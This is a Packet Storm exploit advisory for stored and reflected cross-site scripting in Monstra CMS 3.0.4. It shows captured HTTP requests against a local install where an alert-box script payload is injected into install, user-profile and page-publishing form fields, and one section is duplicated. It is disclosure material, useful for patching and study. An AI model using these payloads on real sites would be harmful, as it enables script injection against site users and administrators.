what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Monstra CMS 3.0.4 Cross Site Scripting

Monstra CMS 3.0.4 Cross Site Scripting
Posted May 20, 2018
Authored by Ismail Tasdelen

Monstra CMS version 3.0.4 suffers from multiple reflective and persistent cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | 3bfe1c63389f9f72b080996c4451b43f30d95003183be45dbe4978c930bf897b

Monstra CMS 3.0.4 Cross Site Scripting

Change Mirror Download
# Exploit Title: [ Stored XSS at Monstra CMS 3.0.4 Install Page ]
# Date: [20.05.2018]
# Exploit Author: [Ismail Tasdelen]
# Vendor Homepage: [http://monstra.org/]
# Software Link: [ Monstra CMS ]
# Version: Monstra CMS 3.0.4
# Tested on: Windows 10 / Debian - XAMMP Web Server
# PoC : https://www.youtube.com/watch?v=AQweKapFzjI
# Stored XSS Payload : "><script>alert('Ismail Tasdelen')</script>

# General :

Request URL: http://localhost/monstra-3.0.4/install.php?action=install
Request Method: POST
Status Code: 302 Found
Remote Address: [::1]:80
Referrer Policy: no-referrer-when-downgrade

# Response Headers :

Cache-Control: no-store, no-cache, must-revalidate
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Date: Mon, 21 May 2018 11:42:57 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Keep-Alive: timeout=5, max=100
location: index.php?install=done
Pragma: no-cache
Server: Apache/2.4.28 (Win32) OpenSSL/1.0.2l PHP/7.1.10
Transfer-Encoding: chunked
X-Powered-By: PHP/7.1.10

# Request Headers :

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 397
Content-Type: application/x-www-form-urlencoded
Cookie: _ga=GA1.1.462912790.1526777418; PHPSESSID=cf7161adcgd90rk4nsu2tne28v
Host: localhost
Origin: http://localhost
Referer: http://localhost/monstra-3.0.4/install.php?action=install
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Mobile Safari/537.36

# Query String Parametres :

action: install

# Form Data :

php:
simplexml:
mod_rewrite:
install:
sitemap:
htaccess:
public:
storage:
backups:
tmp:
sitename: "><script>alert('Ismail Tasdelen')</script>
siteurl: "><script>alert('Ismail Tasdelen')</script>
login: "><script>alert('Ismail Tasdelen')</script>
password: 123456
timezone: Kwajalein
email: test@ismailtasdelen.me
install_submit: Install


-----------------------------
# Exploit Title: [ Reflected XSS at Monstra CMS 3.0.4 Edit User Page ]
# Date: [20.05.2018]
# Exploit Author: [Ismail Tasdelen]
# Vendor Homepage: [http://monstra.org/]
# Software Link: [ Monstra CMS ]
# Version: Monstra CMS 3.0.4
# Tested on: Windows 10 / Debian - XAMMP Web Server
# PoC : https://www.youtube.com/watch?v=_79BdaaPAuc
# Reflected XSS Payload : "><script>alert('Ismail Tasdelen')</script>

# General :

Request URL: http://localhost/monstra-3.0.4/users/1/edit
Request Method: POST
Status Code: 302 302 Found
Remote Address: [::1]:80
Referrer Policy: no-referrer-when-downgrade

# Response Headers :

Cache-Control: no-store, no-cache, must-revalidate
Connection: Keep-Alive
Content-Length: 3028
Content-Type: text/html; charset=UTF-8
Date: Mon, 21 May 2018 11:59:34 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Keep-Alive: timeout=5, max=99
Location: http://localhost/monstra-3.0.4/users/1
Pragma: no-cache
Server: Apache/2.4.28 (Win32) OpenSSL/1.0.2l PHP/7.1.10
X-Powered-By: PHP/7.1.10

# Request Headers :

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 668
Content-Type: application/x-www-form-urlencoded
Cookie: _ga=GA1.1.462912790.1526777418; PHPSESSID=cf7161adcgd90rk4nsu2tne28v; _gid=GA1.1.1813213397.1526902993
Host: localhost
Origin: http://localhost
Referer: http://localhost/monstra-3.0.4/users/1/edit
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Mobile Safari/537.36

# Form Data :

csrf: 0542822c00801b440a8b47e941509f6aeec6e0be
user_id: 1
login: "><script>alert('Ismail Tasdelen')</script>
firstname: "><script>alert('Ismail Tasdelen')</script>
lastname: "><script>alert('Ismail Tasdelen')</script>
email: "><script>alert('Ismail Tasdelen')</script>
twitter: "><script>alert('Ismail Tasdelen')</script>
skype: "><script>alert('Ismail Tasdelen')</script>
about_me: "><script>alert('Ismail Tasdelen')</script>
new_password: "><script>alert('Ismail Tasdelen')</script>
edit_profile: Save

-----------------------------
# Exploit Title: [ Reflected XSS at Monstra CMS 3.0.4 Edit User Page ]
# Date: [20.05.2018]
# Exploit Author: [Ismail Tasdelen]
# Vendor Homepage: [http://monstra.org/]
# Software Link: [ Monstra CMS ]
# Version: Monstra CMS 3.0.4
# Tested on: Windows 10 / Debian - XAMMP Web Server
# PoC : https://www.youtube.com/watch?v=_79BdaaPAuc
# Reflected XSS Payload : "><script>alert('Ismail Tasdelen')</script>

# General :

Request URL: http://localhost/monstra-3.0.4/users/1/edit
Request Method: POST
Status Code: 302 302 Found
Remote Address: [::1]:80
Referrer Policy: no-referrer-when-downgrade

# Response Headers :

Cache-Control: no-store, no-cache, must-revalidate
Connection: Keep-Alive
Content-Length: 3028
Content-Type: text/html; charset=UTF-8
Date: Mon, 21 May 2018 11:59:34 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Keep-Alive: timeout=5, max=99
Location: http://localhost/monstra-3.0.4/users/1
Pragma: no-cache
Server: Apache/2.4.28 (Win32) OpenSSL/1.0.2l PHP/7.1.10
X-Powered-By: PHP/7.1.10

# Request Headers :

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 668
Content-Type: application/x-www-form-urlencoded
Cookie: _ga=GA1.1.462912790.1526777418; PHPSESSID=cf7161adcgd90rk4nsu2tne28v; _gid=GA1.1.1813213397.1526902993
Host: localhost
Origin: http://localhost
Referer: http://localhost/monstra-3.0.4/users/1/edit
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Mobile Safari/537.36

# Form Data :

csrf: 0542822c00801b440a8b47e941509f6aeec6e0be
user_id: 1
login: "><script>alert('Ismail Tasdelen')</script>
firstname: "><script>alert('Ismail Tasdelen')</script>
lastname: "><script>alert('Ismail Tasdelen')</script>
email: "><script>alert('Ismail Tasdelen')</script>
twitter: "><script>alert('Ismail Tasdelen')</script>
skype: "><script>alert('Ismail Tasdelen')</script>
about_me: "><script>alert('Ismail Tasdelen')</script>
new_password: "><script>alert('Ismail Tasdelen')</script>
edit_profile: Save

-----------------------------
# Exploit Title: [ Stored XSS at Monstra CMS 3.0.4 Page Publishing Page ]
# Date: [20.05.2018]
# Exploit Author: [Ismail Tasdelen]
# Vendor Homepage: [http://monstra.org/]
# Software Link: [ Monstra CMS ]
# Version: Monstra CMS 3.0.4
# Tested on: Windows 10 / Debian - XAMMP Web Server
# PoC : https://www.youtube.com/watch?v=j62EBTErvuU
# Stored XSS Payload : "><script>alert('Ismail Tasdelen')</script>

# General :

Request URL: http://localhost/monstra-3.0.4/admin/index.php?id=pages&action=add_page
Request Method: POST
Status Code: 302 302 Found
Remote Address: [::1]:80
Referrer Policy: no-referrer-when-downgrade

# Response Headers :

Cache-Control: no-store, no-cache, must-revalidate
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Date: Mon, 21 May 2018 12:11:49 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Keep-Alive: timeout=5, max=100
Location: index.php?id=pages
Pragma: no-cache
Server: Apache/2.4.28 (Win32) OpenSSL/1.0.2l PHP/7.1.10
Transfer-Encoding: chunked
X-Powered-By: PHP/7.1.10

# Request Headers :

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 518
Content-Type: application/x-www-form-urlencoded
Cookie: _ga=GA1.1.462912790.1526777418; PHPSESSID=cf7161adcgd90rk4nsu2tne28v; _gid=GA1.1.1813213397.1526902993
Host: localhost
Origin: http://localhost
Referer: http://localhost/monstra-3.0.4/admin/index.php?id=pages&action=add_page
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Mobile Safari/537.36

# Query String Parametres :

id: pages
action: add_page

# Form Data :

csrf: 0542822c00801b440a8b47e941509f6aeec6e0be
page_title: "><script>alert('Ismail Tasdelen')</script>
page_name: "><script>alert('Ismail Tasdelen')</script>
page_meta_title:
page_keywords:
page_description:
pages: 0
templates: index
status: published
access: public
editor: "><script>alert('Ismail Tasdelen')</script>
page_tags: "><script>alert('Ismail Tasdelen')</script>
add_page_and_exit: Save and Exit
page_date: 2018-05-22 00:11:1

# You want to follow my activity ?

https://www.linkedin.com/in/ismailtasdelen
https://github.com/ismailtasdelen
https://twitter.com/ismailtsdln
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    16 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close